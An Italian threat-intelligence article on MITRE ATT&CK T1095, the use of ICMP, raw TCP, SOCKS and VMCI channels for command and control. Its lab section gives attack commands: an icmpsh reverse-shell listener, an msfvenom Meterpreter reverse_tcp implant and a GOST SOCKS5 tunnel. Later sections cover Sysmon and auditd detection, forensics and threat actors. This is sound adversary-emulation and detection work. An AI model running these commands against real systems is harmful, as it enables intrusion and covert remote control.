Protocolli Non Applicativi come Canale C2: Non-Application Layer Protocol (T1095)

Il modo più diretto per comprendere questa tecnica è costruire un canale C2 su protocolli non applicativi in laboratorio e osservare cosa vede (e cosa non vede) lo stack difensivo.

Canale ICMP con icmpsh. Il tool icmpsh (open source) permette di ottenere una reverse shell che viaggia interamente su pacchetti ICMP echo/reply. Sul lato attaccante Linux si disabilita prima la risposta kernel ai ping, poi si avvia il listener:

sysctl -w net.ipv4.icmp_echo_ignore_all=1 python3 icmpsh_m.py <IP_ATTACCANTE> <IP_VITTIMA>

Sul target Windows si esegue il client icmpsh.exe, che inizia a incapsulare l'output di cmd.exe in payload ICMP. Questo scenario replica fedelmente ciò che fanno malware come PingPull, Remsec e Regin, tutti documentati con C2 su ICMP.

TCP raw socket con Cobalt Strike e Metasploit. Per simulare i numerosi impianti che usano TCP puro (PlugX, gh0st RAT, Crimson, NETWIRE), è sufficiente generare un payload Meterpreter con stager TCP bind o reverse. In Metasploit Framework (open source):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o implant.exe

Lato handler si configura exploit/multi/handler con lo stesso payload. Il traffico risultante è TCP puro senza header HTTP, esattamente ciò che FIN6 e Ember Bear usano in produzione. Per il red teamer è utile confrontare la visibilità: sniffando con Wireshark si noterà che il contenuto è opaco ma la connessione TCP è ben visibile — il vantaggio per l'attaccante sta nell'assenza di signature applicative, non nell'invisibilità totale.

SOCKS tunneling con GOST. Ember Bear e Gamaredon Group usano tunnel SOCKS5 per il C2. GOST — Go Simple Tunnel (open source) — replica esattamente questo scenario:

gost -L socks5://:9050

Sul lato client si configura il proxy SOCKS5 verso la porta 9050, come documentato per Gamaredon Group. Per testare il tunneling più complesso, EarthWorm (open source) offre funzionalità di port forwarding e SOCKS5 in un singolo binario, lo stesso tool impiegato da BackdoorDiplomacy.

Scenario ESXi — VMCI. Replicare il canale VMCI richiede un lab con ESXi e almeno una VM guest. Il concetto è creare un socket di tipo AF_VSOCK che connetta guest e host senza attraversare la rete fisica. UNC3886 ha usato esattamente questo approccio nella campagna RedPenguin. In laboratorio si può scrivere un PoC minimale in C/Python che apra un SOCK_STREAM su AF_VSOCK e verificare con lsof -A che il socket compaia come tipo SOCKET_VMCI — esattamente l'artefatto da cercare in detection.

Checklist rapida per il lab:

• Verificare che il firewall perimetrale del lab non filtri ICMP in uscita (altrimenti il test icmpsh fallisce silenziosamente)
• Catturare il traffico con tcpdump usando il filtro icmp o tcp port 4444 per confrontare i pattern
• Documentare i byte ratio client→server vs server→client: nei canali C2 legittimi il server invia più dati (comandi), il client risponde con output

Rilevare un protocollo non applicativo usato come canale C2 significa osservare comportamenti anomali su traffico che la rete considera normale. La sfida non è tecnica in senso stretto — i log esistono — ma di calibrazione: ICMP e UDP sono ovunque, e un alert mal configurato genera rumore inutile.

Log source primari e cosa cercare. Su Windows il punto di partenza è Sysmon (open source, richiede installazione separata). Gli eventi EventID 3 (Network Connection) registrano ogni connessione di rete con processo sorgente, IP e protocollo. La detection analytic AN1254 suggerisce di correlare questi eventi con i flussi di rete (NSM:Flow) cercando processi non di rete che generano traffico ICMP o UDP. Il tuning critico è la whitelist di processo: ping.exe, il resolver DNS nativo e pochi altri sono legittimi. Tutto il resto — specialmente interpreti come powershell.exe, python.exe o binari unsigned in directory temporanee — merita investigazione.

Su Linux la fonte è auditd con regole sulla syscall socket filtrata per SOCK_RAW. L'analytic AN1255 si concentra proprio su questo: processi user-mode come bash, Python o netcat che aprono raw socket. Una regola auditd efficace è:

-a always,exit -F arch=b64 -S socket -F a0=2 -F a1=3 -k raw_socket_creation

Questa cattura ogni creazione di socket raw (a1=3 corrisponde a SOCK_RAW) e la tagga con la chiave raw_socket_creation. La finestra di correlazione consigliata è di 2 minuti tra l'evento di esecuzione e il flusso di rete corrispondente.

Il problema ICMP. Il traffico ICMP legittimo ha caratteristiche prevedibili: pacchetti di dimensione standard (64 byte su Linux, 32 su Windows), durata breve, pattern request/reply bilanciato. Un tunnel ICMP-C2 invece mostra pacchetti di dimensione variabile, sessioni prolungate oltre i 5 minuti (soglia suggerita dall'analytic AN1258) e un'entropia del payload significativamente più alta del normale. Strumenti di network monitoring come Zeek (open source) possono calcolare l'entropia dei payload ICMP e generare alert quando supera una soglia configurabile.

Indicatore di byte ratio. L'analytic AN1254 introduce un concetto potente: il ByteTransferAnomalyThreshold. Se un host invia tramite ICMP o UDP significativamente più dati di quanti ne riceva (oltre il 90% del traffico in una direzione), il pattern è compatibile con esfiltrazione. Questo indicatore è particolarmente efficace perché i canali C2 legittimi tendono ad avere un rapporto più bilanciato.

ESXi e VMCI. L'analytic AN1257 affronta lo scenario più insidioso: il traffico VMCI non attraversa la rete, quindi nessun IDS/IPS perimetrale lo intercetta. La detection avviene esclusivamente sui log esxi:vmkernel, cercando processi non VMware-nativi che aprono porte VMCI. Il comando lsof -A eseguito periodicamente sull'host ESXi rivela socket di tipo SOCKET_VMCI — qualsiasi processo che non sia parte dell'infrastruttura vSphere e utilizzi VMCI è un indicatore ad alta confidenza.

Riduzione falsi positivi — priorità:

• Costruire una baseline per host/segmento dei protocolli normalmente utilizzati (tuning ProtocolUsageBaseline)
• Escludere tool di monitoraggio infrastrutturale che usano ICMP legittimamente (Nagios, PRTG, SolarWinds)
• Correlare sempre il processo sorgente: un ping.exe che genera traffico ICMP è normale, un svchost.exe che lo fa non lo è

L'indagine forense su un canale C2 non applicativo richiede di intrecciare artefatti endpoint con catture di rete, perché il traffico stesso spesso non lascia tracce nei log applicativi. Il protocollo è il messaggio: ricostruire cosa è transitato su quel canale ICMP o TCP raw è la sfida principale.

Artefatti Windows. Il punto di partenza sono i log Sysmon, se disponibili. Gli eventi EventID 3 con protocollo icmp o connessioni TCP su porte non standard (es. porta 5200 per WarzoneRAT, porta 5000 come nella campagna RedDelta Modified PlugX Infection Chain Operations) forniscono il timestamp esatto della prima connessione C2. Incrociando con EventID 1 (Process Create) si risale al binario responsabile, al suo hash e alla command line di lancio.

Per gli impianti che usano la Windows Socket API — come Royal, che chiama WSASocketW per stabilire il canale TCP, o StealBit, che usa la libreria di rete Windows — l'artefatto chiave è la Prefetch: il file .pf del binario malevolo contiene il timestamp di prima e ultima esecuzione e i file referenziati al caricamento. Se il binario è stato cancellato, la Prefetch ne conserva comunque il nome e il percorso originale.

Le connessioni TCP persistenti lasciano traccia anche nel registro di Windows. La chiave HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters e le interfacce di rete associate possono rivelare configurazioni proxy SOCKS anomale, rilevanti quando si indaga su attività tipo Gamaredon Group (SOCKS5 su porta 9050) o APT3 (SOCKS5 per il downloader iniziale).

Artefatti Linux e appliance. Su sistemi Linux la ricostruzione si basa sui log auditd, cercando eventi SYSCALL con syscall socket e argomenti che indicano SOCK_RAW o AF_VSOCK. Per la campagna Cutting Edge, che ha sfruttato appliance Ivanti, gli artefatti critici sono i socket Unix (/tmp/ e directory temporanee) e le reverse TCP shell: il file .bash_history o equivalente, se non cancellato, può contenere i comandi di attivazione.

Sugli host ESXi, l'artefatto principale è l'output storico di lsof (se raccolto periodicamente) o i log vmkernel che registrano l'apertura di socket VMCI. La campagna RedPenguin di UNC3886 ha distribuito versioni personalizzate di TINYSHELL su router Juniper e backdoor VMCI su ESXi: in questo scenario l'analista deve cercare binari non firmati nelle directory di sistema ESXi e confrontarne gli hash con quelli noti.

Catture di rete e ricostruzione del canale. Se sono disponibili PCAP, l'analisi del traffico ICMP sospetto con Wireshark (open source) o tshark rivela pattern caratteristici. Un filtro utile:

tshark -r capture.pcap -Y "icmp && data.len > 64" -T fields -e ip.src -e ip.dst -e data.len

Questo estrae tutti i pacchetti ICMP con payload superiore ai 64 byte — dimensione anomala per ping standard — mostrando sorgente, destinazione e dimensione. I malware come COATHANGER e Anchor usano ICMP per trasmettere configurazioni e comandi, generando pacchetti con payload variabile che questo filtro intercetta.

Per il traffico TCP raw su porte non standard, la timeline si costruisce incrociando i flussi NetFlow/IPFIX con gli artefatti endpoint. La campagna 2022 Ukraine Electric Power Attack ha usato tunnel TLS su TCP non-HTTP: in questi casi, l'assenza di un handshake TLS standard (SNI mancante, certificato self-signed) nel PCAP è un indicatore forense forte.

I 12 gruppi che impiegano questa tecnica coprono un arco geografico e motivazionale ampio, ma emergono pattern ricorrenti che permettono di anticipare le scelte operative degli avversari.

UNC3886 rappresenta la frontiera più avanzata dell'uso di protocolli non applicativi. Questo gruppo ha distribuito backdoor che comunicano via TCP verso dispositivi di rete compromessi e via VMCI verso host ESXi, come documentato nella campagna RedPenguin (C0056, luglio 2024 – marzo 2025). L'uso del VMCI è particolarmente significativo: il traffico non attraversa la rete fisica, rendendo inefficace qualsiasi monitoraggio perimetrale. UNC3886 ha puntato su router Juniper MX Series, segnalando un interesse specifico per l'infrastruttura di rete come superficie d'attacco.

Mustang Panda si colloca in un paradigma più tradizionale ma altrettanto efficace. Nella campagna RedDelta Modified PlugX Infection Chain Operations (C0047, luglio 2023 – dicembre 2024), il gruppo ha usato TCP sulla porta 5000 per connettere i server amministrativi ai nodi C2, sfruttando reverse shell TCP tramite cmd.exe. Il pattern è coerente: PlugX, il malware di riferimento del gruppo, supporta nativamente TCP raw e UDP, offrendo flessibilità nella scelta del canale.

Ember Bear mostra un profilo operativo che combina tool offensivi open source — NetCat, GOST per il tunneling SOCKS, Meterpreter per reverse TCP — con un approccio a basso costo e alta adattabilità. Il mix di strumenti rende l'attribuzione più complessa ma anche la detection più accessibile, perché gli artefatti di questi tool sono ben documentati.

Sul fronte dello spionaggio asiatico, PLATINUM ha adottato un approccio inusuale sfruttando il canale Serial-over-LAN (SOL) dell'Intel Active Management Technology. Questa scelta sfrutta un canale di comunicazione hardware fuori banda, invisibile al sistema operativo e ai suoi strumenti di sicurezza — un paradigma che potrebbe trovare nuovi adepti con la diffusione di tecnologie di gestione remota.

Il cluster Volt Typhoon, pur non elencato direttamente tra i gruppi, è centrale in due campagne: KV Botnet Activity (C0035) e Versa Director Zero Day Exploitation (C0039). Entrambe usano protocolli custom su TCP, puntando su infrastrutture critiche e dispositivi di rete edge. Il pattern emergente è chiaro: gli attori legati alla Cina stanno sistematicamente spostandosi dal compromesso degli endpoint al compromesso dell'infrastruttura di rete stessa — router, VPN concentrator, SD-WAN controller — dove i protocolli non applicativi sono più difficili da monitorare.

Trend operativo complessivo. L'analisi delle 8 campagne rivela una progressione: dal semplice TCP raw (campagna C0021, 2018) all'uso di protocolli custom (KV Botnet, Operation Wocao) fino al VMCI e ai canali hardware fuori banda. La direzione è verso superfici di comunicazione dove gli strumenti di sicurezza tradizionali hanno visibilità zero. Per l'analista TI, questo significa che il monitoraggio deve espandersi oltre il perimetro di rete per includere hypervisor, firmware e canali di gestione remota.

Framework MITRE ATT&CK v16 — T1095 (Non-Application Layer Protocol), TA0011. Campagne: C0047, C0029, C0034, C0021, C0035, C0014, C0056, C0039. Detection analytics: AN1254, AN1255, AN1256, AN1257, AN1258. Mitigazioni: M1031, M1047, M1037, M1030. Integrato con conoscenza professionale per tool e procedure operative.